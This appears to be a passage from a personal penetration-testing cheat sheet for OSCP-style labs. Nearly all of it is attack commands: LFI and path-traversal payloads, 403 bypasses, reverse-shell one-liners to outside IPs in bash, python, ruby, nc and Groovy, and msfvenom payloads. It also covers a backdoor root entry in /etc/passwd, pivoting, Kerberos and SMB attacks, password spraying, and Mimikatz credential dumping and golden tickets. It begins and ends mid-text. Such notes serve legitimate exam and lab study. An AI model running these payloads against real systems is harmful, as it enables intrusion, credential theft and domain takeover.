/etc/passwd #displaying content through absolute path cat ../../../etc/passwd #relative path # if the pwd is /var/log/ then in order to view the /etc/passwd it will be like this cat ../../etc/passwd #In web int should be exploited like this, find a parameters and test it out http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd #check for id_rsa, id_ecdsa #If the output is not getting formatted properly then, curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd #For windows http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide drive ``` - URL Encodign ```bash #Sometimes it doesn't show if we try path, then we need to encode them curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd ``` ### Local File Inclusion | OWASP TOP 10 ```bash #At first we need http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here #Reverse shells bash -c \"bash -i >& /dev/tcp/192.168.119.3/4444 0>&1\" #We can simply pass a reverse shell to the cmd parameter and obtain reverse-shell bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of above reverse-shell #PHP wrapper curl \"http://mountaindesserts.com/meteor/index.php?page=data://text/plain, \" curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php ``` ### LFI | OWASP TOP 10 ```bash LFI EXPLOITS Basic Payload http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow URL Encoding http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd Double Encoding http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd UTF-8 Encoding http://example.com/index.php?page=%c0%ae%c0% ae/%c0%ae%c0% ae/%c0%ae%c0%ae/etc /passwd Using Null Byte (%00) http://example.com/index.php?page=../../../etc/passwd%00 From an Existent Folder http://example.com/index.php?page=scripts/../../../../../etc/passwd Path Truncation http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././. http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd SECURE CYBER EXPERIENCE Using PHP Wrappers: filter http://example.com/index.php?page=php://filter/read-string.rot13/resource=config.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config. php Using PHP Wrappers: zlib http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/ resource=/etc/shadow Using PHP Wrappers: zip echo \" \"> payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php ``` ### Bypass 403 (Forbidden) ```bash 1. X-Original-URL: # GET /anything HTTP/1.1 # Host: target.com # X-Original-URL: /admin 2. Appending %2e after the first slash # http://target.io/admin => 403 # http://target.io/%2e/admin => 200 3. Try add dot (.) slash (/) and semicolon(;) in the URL # http://target.io/admin => 403 # http://target.io/admi/. => 200 # http://target.io//admi// => 200 # http://target.io/./admi/.. => 200 # http://target.io/;/admi/ => 200 # http://target.io/.;/admi/ => 200 # http://target.io//;//admi/ => 200 4. Add \"..;/\" after the directory name # http://target.io/admin # http://target.io/admin..;/ 1. Try to uppercase the alphabet in the url # http://target.io/aDmIN ``` ### Netcat | Nc ```bash rlwrap nc -nlvp 9000 nc -lvnp 9001 nc -nv 192.168.1.1 80 #Just in case if nmap unable to pull a service ``` ### Searchsploit ```bash searchsploit searchsploit -m windows/remote/46697.py #Copies the exploit to the current location ``` ### Reverse Shells w MSFVenom ```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php ``` #### One Line ```bash bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' 0 /dev/tcp/10.0.0.1/4242; sh &196 2>&196 nc -e /bin/bash 10.10.14.16 7777 python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")' ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",4242).to_i;exec sprintf(\"/bin/sh -i &%d 2>&%d\",f,f,f)' /bin/bash -c 'exec bash -i >& /dev/tcp/ / 0>&1' & /dev/tcp/10.10.14.88/7777 0>&1'\");?> & /dev/tcp/10.11.0.106/443 0>&1');?> #For powershell use the encrypted tool that's in Tools folder # NOTE: Windows only ruby -rsocket -e 'c=TCPSocket.new(\"10.0.0.1\",\"4242\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end' ``` https://www.revshells.com/ https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ ### Exiftool ```bash exiftool img.png exiftool *.pdf ``` ## Linux Privilege Escalation _Linux Enumeration Commands_ ```bash #list the name of the host/Display all network addresses of the host hostname -I # uname -a cat /proc/version # prints almost same infor of above command but more like gcc version.... cat /etc/crontab #Cron Jobs cat /etc/issue # exact version on the OS ps # lists the processes that are running ps -A # all running processes ps axjf # process tree ps aux # displays processes with the users as well env # shows all the environment variable sudo -l # lists the commands that any user run as root without password groups # lists the groups that current user is in id # lists id of group,user cat /etc/passwd - displays all the user cat /etc/passwd | cut -d \":\" -f 1 # removes other stuff & only displays users ls /home - displays users bash -p history - previously ran commands which might have some sensitive info ifconfig (or) ip a (or) ip route - network related information netstat - network route netstat -a # all listening and established connection netstat -at # tcp connections netstat -au # udp connections netstat -l # listening connections netstat -s # network statistics netstat -tp # connections with service name and pid we can also add \"l\" for only listening ports netstat -i # interface related information netstat -ano find command which helps us in finding lot of stuff, Syntax: find find . -name flag1.txt # find the file named “flag1.txt” in the current directory find /home -name flag1.txt # find the file names “flag1.txt” in the /home directory find / -type d -name config # find the directory named config under “/” find / -type f -perm 0777 # find files with the 777 permissions (files readable, writable, and executable by all users) find / -perm a=x # find executable files find /home -user frank # find all files for user “frank” under “/home” find / -mtime 10 # find files that were modified in the last 10 days find / -atime 10 # find files that were accessed in the last 10 day find / -cmin -60 # find files changed within the last hour (60 minutes) find / -amin -60 # find files accesses within the last hour (60 minutes) find / -size 50M # find files with a 50 MB size find / -writable -type d 2>/dev/null # Find world-writeable folders find / -perm -222 -type d 2>/dev/null # Find world-writeable folders find / -perm -o w -type d 2>/dev/null # Find world-writeable folders find / -perm -o x -type d 2>/dev/null # Find world-executable folders We can also find programming languages and supported languages: find / -name perl*, find / -name python*, find / -name gcc* ...etc find / -perm -u=s -type f 2>/dev/null # Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user. This is important! #Check commands you can execute with sudo sudo -l #Check Group id id #Check folder permissions ls -la #Check root process ps -ef | grep root #Search write-able services ls -la $(find . -type s -writable 2>/dev/null) #Search write-able files ls -la $(find . -type f -writable 2>/dev/null) #delete file shred -zun 10 -v file.php #Find all SUID binaries find / -perm -4000 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \\; 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -writable -type d 2>/dev/null dpkg -l #Installed applications on debian system cat /etc/fstab #Listing mounted drives lsblk #Listing all available drives lsmod #Listing loaded drivers getcap -r / 2>/dev/null #Capabilities watch -n 1 \"ps -aux | grep pass\" #Checking processes for credentials sudo tcpdump -i lo -A | grep \"pass\" #Password sniffing using tcpdump # List All Users on a System cat /etc/passwd # Search Passwords grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' * 2>/dev/null # List All Users on a System (cleaner, only users) awk –F’:‘ ’{ print $1}’ /etc/passwd # List All Logged in Users who | awk ‘{print $1}’ | sort | uniq | tr ‘\\n’ ‘ ’ # Find files modified /dev/null # Web files ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null # Creating entry for /etc/passwd openssl passwd -1 -salt ignite pass123 > $1$ignite$3eTbJm98O9Hz.k1NTdNxe1 echo \"temp:\\$1\\$ignite\\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash\" >> /etc/passwd su temp pass pass123 # OSCP Flag Proof cat /root/proof.txt && whoami && hostname && ip addr ``` ### Pivoting ```bash # For this you need to configuration the proxychains.conf ./chisel server -p 1234 --reverse #attacker machine .1 ./chisel client {IP}:1234 R:socks #victim machine .2 - tunnel redirection through a SOCKS socket. # Remote Port Forwarding ./chisel client 10.10.10.1:1234 R:22:20.20.20.3:22 #victim machine .2 lsof -i:22 # Identify if the service is run by the port 22 #shh with proxychains proxychains ssh user@20.20.20.3 ./socat TCP-LISTEN:1111,fork TCP:10.10.10.1:6150 #victim machine .2 ./chisel client 20.20.20.2:1111 R:1111:socks #victim machine .3 ./socat TCP-LISTEN:443,fork TCP:20.20.20.2:442 # 20.20.20.3 ./socat TCP-LISTEN:442,fork TCP:10.10.10.1:441 # 20.20.20.2 ``` ### TTY ```bash python -c 'import pty; pty.spawn(\"/bin/bash\")' python3 -c 'import pty; pty.spawn(\"/bin/bash\")' echo 'os.system('/bin/bash')' /bin/sh -i /bin/bash -i perl -e 'exec \"/bin/sh\";' ``` ### Automated Scripts ```bash linPEAS.sh LinEnum.sh linuxprivchecker.py unix-privesc-check Mestaploit: multi/recon/local_exploit_suggester ``` ### Sensitive Information ```bash cat .bashrc env #checking environment variables watch -n 1 \"ps -aux | grep pass\" #Harvesting active processes for credentials #Process related information can also be obtained from PSPY ``` ### Sudo/SUID/Capabilities - https://gtfobins.github.io/ ```bash sudo -l find / -perm -u=s -type f 2>/dev/null getcap -r / 2>/dev/null ``` ### Cron Jobs ```bash #Detecting Cronjobs cat /etc/crontab crontab -l pspy #handy tool to livemonitor stuff happening in Linux grep \"CRON\" /var/log/syslog #inspecting cron logs ``` ### NFS ```bash ##Mountable shares cat /etc/exports #On target showmount -e #On attacker ###Check for \"no_root_squash\" in the output of shares mount -o rw : #Now create a binary there chmod +x ``` --- ## Tools [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) [ExplainShell](https://www.explainshell.com/) [CrackShadow](https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/) [linPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) [LinEnum](https://github.com/rebootuser/LinEnum) [LinuxSmartEnum](https://github.com/diego-treitos/linux-smart-enumeration) [LinuxExploitSuggester](https://github.com/mzet-/linux-exploit-suggester) [GTFO-bins](https://gtfobins.github.io/) [Chisel](https://github.com/jpillora/chisel) [Socat](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat) # **Windows** #### Downloading on Windows ```powershell powershell -command Invoke-WebRequest -Uri http://LHOST:LPORT/FILE -Outfile C:\\\\temp\\\\FILE iwr -uri http://lhost/file -Outfile file certutil -urlcache -split -f \"http://LHOST/FILE\" FILE copy \\\\kali\\share\\file . ``` ### Command Windows - Network Enumerate - Adding Users - What users belong to groups that allow remote management? ```powershell 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect(\"IP\", $_)) \"TCP port $_ is open\"} 2>$null #automating port scan of first 1024 ports in powershell net user hacker hacker123 /add net localgroup Administrators hacker /add net localgroup \"Remote Desktop Users\" hacker /ADD # (Depends on Domain Policies) net user /domain #all users in domain net user username /domain # information on a domain user net group /domain net group groupname /domain #File and directory Get-ChildItem or ls # list files in directory Set-Location or cd # Change directory New-Item -ItemType Directory # Create directory Copy-Item # Copy files Move-Item # Move/Rename items Remove-Item # delete files Get-Content # View file content Select-String # Search file content New-Item -ItemType file #Create an empty file # System information Get-Process # Display running processes Get-ComputerInfo # Display system information Get-NetIPConfiguration # Show network configuration # User and Permissions whoami # view current user Get-LocalUser # List users on the system Set-Acl # Change file permissions (Get-Acl).Access # View file permissions Resolve-DnsName # resolve dns name Get-NetTCPConnection # view open ports Get-NetAdapter # view network interfaces # Scripting and variables $variable = value # Declare a variable $variable # display variable value function MyFunc {} # Create a function if ($condition) {} # Conditional statements # Start-Process -Verb RunAs # Run command as admin ``` ### RDP ```bash xfreerdp /v: /u: /p: /cert-ignore xfreerdp /v: /u: /p: /d: /cert-ignore xfreerdp /v: /u: /p: /dynamic-resolution +clipboard xfreerdp /v: /u: /d: /pth:' ' /dynamic-resolution +clipboard xfreerdp /v: /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla rdesktop ``` ### showmount ```bash /usr/sbin/showmount -e sudo showmount -e chown root:root sid-shell; chmod +s sid-shell ``` ### SMB ```powershell netexec smb IP netexec smb 10.10.11.14 -u 'anyname' --shares netexec smb 10.10.11.23 -u name -o '' --shares # List folders shares #crackmapexec crackmapexec smb 192.168.1.100 -u username -p password crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares crackmapexec smb 192.168.1.100 -u username -p password --users #lists users crackmapexec smb 192.168.1.100 -u username -p password --all #all information crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain # Search user in based error with file.txt crackmapexec smb IP -u ../file.txt -p '' --kerberos | tee --/output.txt # List shares netexec smb host/ip -u user -p password --shares netexec smb host/ip -u guest -p '' --shares #without password netexec smb host/ip -u guest -p '' -M spider_plus # Brute Force Rid: netexec smb domain -u djlawkdjlakw -p '' --rid-brute 10000 smbclient -N -L //IP # Enumerate files smbclient //ip/share -N smbclient //ip/share -U username password #SMBmap smbmap -H smbmap -H -u -p smbmap -H -u -p -d smbmap -H -u -p -r # RID cycle attacks lookupsid.py -no-pass 'user@domain.htb' 2000 lookupsid.py -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' # list users ``` ### LDAP | TCP/389 & Kerberos | TCP/88 ```powershell # Kerberoasting crackmapexec ldap 10.10.10.12 -u admin -p pepito123 --kerberoast kerber.txt # Kerberoasting without PreAuth GetUserSPNs.p -usersfile ../file.txt -dc-host IP -no-preauth jjones domain.htb/ #List all users crackmapexec ldap 10.10.10.12 -u admin2 -p pepito123 --users | tee adusers.txt #Folders share crackmapexec ldap 10.10.10.12 -u admin2 -p pepito123 --shares # search file on based a extensions crackmapexec ldap 10.10.10.12 -u admin2 -p pepito123 --spider RedirectedFolders$ --pattern txt # Validate creds w WinRM netexec winrm rebound.htb -u pepito -p '1234@$$5' # Validate creds w Ldap netexec ldap rebound.htb -u pepito -p '1234@$$5' -k # try on both ldap and ldaps, this is first command to run if you dont have any valid credentials. ldapsearch -x -H ldap:// : ldapsearch -x -H ldap:// -D '' -w '' -b \"DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"DC= ,DC= \" #CN name describes the info w're collecting ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Users,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Computers,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Domain Admins,CN=Users,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Domain Users,CN=Users,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Enterprise Admins,CN=Users,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Administrators,CN=Builtin,DC= ,DC= \" ldapsearch -x -H ldap:// -D ' \\ ' -w ' ' -b \"CN=Remote Desktop Users,CN=Builtin,DC= ,DC= \" #windapsearch.py #for computers python3 windapsearch.py --dc-ip -u -p --computers #for groups python3 windapsearch.py --dc-ip -u -p --groups #for users python3 windapsearch.py --dc-ip -u -p --da #for privileged users python3 windapsearch.py --dc-ip -u -p --privileged-users # gMSA (Group Managed Service Account) netexec ldap dc01.domain.htb -u userprivilege -p password -k --gmsa ``` ### Delegation Permissions | AD ```powershell # Find user accounts with delegation permissions in an Active Directory environment. findDelegation.py domain/user:'password' -dc-ip dc01 -k ``` https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html ### TGS | Ticket Granting Service ```powershell # for SPN (Service Principal Name) (Kerberos) getST.py -dc-ip domain.htb -spn http/dc01.domain.htb -hashes :IP -impersonate administrator domain.htb/'user' -self # get a TGT as user$ getTGT.py 'domain/user$' -hashes :ah9737 -dc-ip domain.htb ``` ### Attack RBCD ```powershell # Resource-Based Constrained Delegation (RBCD) rbcd.py 'domain.htb/user$' -hashes :2787gd8... -delegate-to 'user$' -delegate-from 'user1' -dc-ip dc01 -action 'write' -k -user-ldaps # Abuse Contrained and RCBD getST.py domain.htb/user1:'pass' -spn browser/dc01.domain.htb -impersonate 'DC01$' ``` ### AS-REP Roasting ```powershell #As-rep-roasting netexec ldap domain -u file.txt -p '' --asreproast asrp.txt ``` ### reGeorg ```powershell # Config proxychains to 127.0.0.1 1234 (create a tunnel priv for internal ports of target) $ python reGeorgSocksProxy.py -p 1234 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp ``` ### Socat ```powershell # Tunnel TCP sudo socat -v TCP-LISTEN:135, fork, reuseaddr TCP:IP:PORT ``` ### Password Spray ```powershell # password spray netexec smb rebound.htb -u users -p '1GR8t@$$4u' --continue-on-success #Password Spray - we have a some user but just one password crackmapexec ldap 10.10.10.12 -u file.txt -p pepito123 --kerberos --continue-on-succes crackmapexec smb IP/host -u users.txt -p 'pass' -d domain.htb --continue-on-success #use continue-on-success option if it's subnet proxychains -q /home/kali/go/bin/kerbrute passwordspray -d domain.htb users.txt password1 --dc 10.10.103.152 -vvv # Brute Force kerbrute bruteuser -d domain.com jeffadmin password.txt kerbrute passwordspray -d domain.htb users.txt password1 ``` ### Evil-Winrm ```powershell #login with user and password sudo evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)' ##Login with Hash evil-winrm -i $IP -u user -H ntlmhash sudo evil-winrm -i blazorized.htb -u Administrator -H 'Ni7856Do9854Ki05Ng0005wa2e' # Loading files directly from kali evil-winrm -i $IP -u user -p pass -s /opt/privsc/powershell Bypass-4MSI Invoke-Mimikatz.ps1 Invoke-Mimikatz ##evil-winrm commands menu # to view commands #There are several commands to run #This is an example for running a binary evil-winrm -i -u user -p pass -e /opt/privsc Bypass-4MSI menu Invoke-Binary /opt/privsc/winPEASx64.exe #login with proxychains to tunnel priv proxychains evil-winrm -i 127.0.0.1 -u 'simple' -p 'password' 2>/dev/null ``` ### Impacket ```powershell smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address] #we connect to the server rather than a share lookupsid.py [domain]/[user]:[password/password hash]@[Target IP Address] #User enumeration on target services.py [domain]/[user]:[Password/Password Hash]@[Target IP Address] [Action] #service enumeration secretsdump.py [domain]/[user]:[password/password hash]@[Target IP Address] #Dumping hashes on target GetUserSPNs.py [domain]/[user]:[password/password hash]@[Target IP Address] -dc-ip -request #Kerberoasting, and request option dumps TGS GetNPUsers.py test.local/ -dc-ip -usersfile usernames.txt -format hashcat -outputfile hashes.txt #Asreproasting, need to provide usernames list GetNPUsers.py -usersfile users domain.htb/ -dc-ip 10.10.11.231 ##RCE psexec.py test.local/john:password123@10.10.10.1 psexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 wmiexec.py test.local/john:password123@10.10.10.1 wmiexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 smbexec.py test.local/john:password123@10.10.10.1 smbexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 atexec.py test.local/john:password123@10.10.10.1 atexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 ``` ### NFS Enumeration ```powershell nmap -sV --script=nfs-showmount IP showmount -e IP ``` ### SNMP Enumeration ```powershell #Nmap UDP scan sudo nmap -A -T4 -p- -sU -v -oN nmap-udpscan.txt snmpcheck -t -c public #Better version than snmpwalk as it displays more user friendly snmpwalk -c public -v1 -t 10 #Displays entire MIB tree, MIB Means Management Information Base snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25 #Windows User enumeration snmpwalk -c public -v1 1.3.6.1.2.1.25.4.2.1.2 #Windows Processes enumeration snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2 #Installed software enumeraion snmpwalk -c public -v1 1.3.6.1.2.1.6.13.1.3 #Opened TCP Ports #Windows MIB values 1.3.6.1.2.1.25.1.6.0 - System Processes 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 1.3.6.1.2.1.25.6.3.1.2 - Software Name 1.3.6.1.4.1.77.1.2.25 - User Accounts 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports ``` ### RPC Enumeration ```powershell rpcclient -U=user $IP rpcclient -U=\"\" $IP #Anonymous login ##Commands within in RPCclient srvinfo enumdomusers #users enumpriv #like \"whoami /priv\" queryuser #detailed user info getuserdompwinfo #password policy, get user-RID from previous command lookupnames #SID of specified user createdomuser #Creating a user deletedomuser enumdomains enumdomgroups querygroup #get rid from previous command querydispinfo #description of all users netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions netshareenumall lsaenumsid #SID of all users ``` - Tip: The user for get a shell, need to are in 'Remote Managament User' Group. ### Mimikatz ```powershell # Dumps credentials from memory, using the Mimikatz module in PowerShell. Invoke-Mimikatz -DumpCreds sekurlsa::pth /user: /domain: /ntlm: /run: : # Allows authentication using NTLM hashes, enabling lateral movement without knowing the password. sekurlsa::logonpasswords # Extracts plaintext passwords and hashes for logged-in users. privilege::debug token::elevate lsadump::sam lsadump::sam SystemBkup.hiv SamBkup.hiv lsadump::dcsync /domain:domain.htb /user:Administrator lsadump::lsa /patch ``` #### Mimikatz | CheatSheet ```powershell #general privilege::debug log log customlogfilename.log #sekurlsa sekurlsa::logonpasswords sekurlsa::logonPasswords full sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd #kerberos kerberos::list /export kerberos::ptt c:\\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi .\\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt #crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export #vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\\krbtgt /domain:lab.local #pth sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe #ekeys sekurlsa::ekeys #dpapi sekurlsa::dpapi #minidump sekurlsa::minidump lsass.dmp #ptt kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi #golden/silver kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi #tgt kerberos::tgt #purge kerberos::purge ``` ### Groovy reverse-shell ```bash String host=\"localhost\"; int port=8044; String cmd=\"cmd.exe\"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ### Shadow Credentials (kerberos) ```powershell certipy shadow auto -username user@domain.htb -password 'pass' -k -account winrm_svc -target dc01.rebound.htb ``` ### Credential Delegation (Kerberos) ```powershell # https://github.com/antonioCoco/RemotePotato0 .\\RemotePotato0.exe -m 2 -s 1 -x ip -p port ``` ### Ligolo-ng ```powershell #Creating interface and starting it. sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up #Kali machine - Attacker machine ./proxy -laddr 0.0.0.0:9001 -selfcert #windows or linux machine - compromised machine agent.exe -connect :9001 -ignore-cert #In Ligolo-ng console session #select host ifconfig #Notedown the internal network's subnet start #after adding relevent subnet to ligolo interface #Adding subnet to ligolo interface - Kali linux sudo ip r add dev ligolo ``` ### Windows Privilege Escalation `cd C:\\ & findstr /SI /M \"OS{\" *.xml *.ini *.txt` - for finding files which contain OSCP flag.. #### Manual Enumeration commands ```powershell #Groups we're part of whoami /groups # lists everything we own. whoami /all Get-Acl -Path # Displays the Access Control List (ACL) for files or directories, to check for misconfigurations or weak permissions. Get-LocalGroupMember Administrators # Checks if the current user has admin privileges. icacls # Similar to Get-Acl, lists permissions for files and folders Invoke-BypassUAC # From PowerSploit; technique to bypass UAC (User Account Control), such as loading specific DLLs or using certain exploits. # Networking Invoke-Command -ComputerName -ScriptBlock { commands } # Executes PowerShell commands on a remote machine. Enter-PSSession -ComputerName # Establishes an interactive session with a remote machine using PowerShell remoting. # Copy Files to Remote System Copy-Item -Path -Destination \\\\ \\C$\\ # Copies files to a remote system’s administrative share (requires administrative privileges). #Starting, Restarting and Stopping services in Powershell Start-Service Stop-Service Restart-Service #Powershell History Get-History (Get-PSReadlineOption).HistorySavePath #displays the path of consoleHost_history.txt type C:\\Users\\sathvik\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt #Viewing installed execuatbles Get-ItemProperty \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*\" | select displayname Get-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*\" | select displayname #Process Information Get-Process Get-Process | Select ProcessName,Path #Sensitive info in XAMPP Directory Get-ChildItem -Path C:\\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\\Users\\dave\\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue #this for a specific user #Service Information Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} ``` ### Windows Directory ```powershell C:\\windows\\system32 # stores essential system binaries and lib C:\\windows\\system32\\drives # location for device drivers C:\\windows\\system32\\config # holds system config files, such as the registry hives C:\\Temp or C:\\Windows\\Temp # temporary files that are deleted upon reboot C:\\Recycle Bin # default location for deleted files C:\\windows\\Installer # stores installation files and metadata C:\\windows\\WinSxS # stores side-by-side assemblies and system components C:\\windows\\Tasks # location for scheduled tasks C:\\windows\\Prefetch # Contains preloaded application data C:\\windows\\Inf # Contains setup information C:\\windows\\Logs # stores various log files generated by the system components C:\\windows\\assembly # location for global assembly cache C:\\windows\\System #legacy directory on older windows v C:\\windows\\Help ``` ### Automated Scripts ```bash winpeas.exe winpeas.bat Jaws-enum.ps1 powerup.ps1 PrivescCheck.ps1 ``` ### Token Impersonation - Command to check whoami /priv ```powershell #Printspoofer PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -c \"nc.exe -e cmd\" #RoguePotato RoguePotato.exe -r -e \"shell.exe\" -l 9999 #GodPotato GodPotato.exe -cmd \"cmd /c whoami\" GodPotato.exe -cmd \"shell.exe\" #JuicyPotatoNG JuicyPotatoNG.exe -t * -p \"shell.exe\" -a #SharpEfsPotato SharpEfsPotato.exe -p C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -a \"whoami | Set-Content C:\\temp\\w.log\" #writes whoami command to w.log file ``` --- # Post Exploitation > This is more windows specific as exam specific. 💡 Run WinPEAS.exe - This may give us some more detailed information as no we’re a privileged user and we can open several files, gives some edge! ## Sensitive Information ### Powershell History ```powershell type %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt #Example type 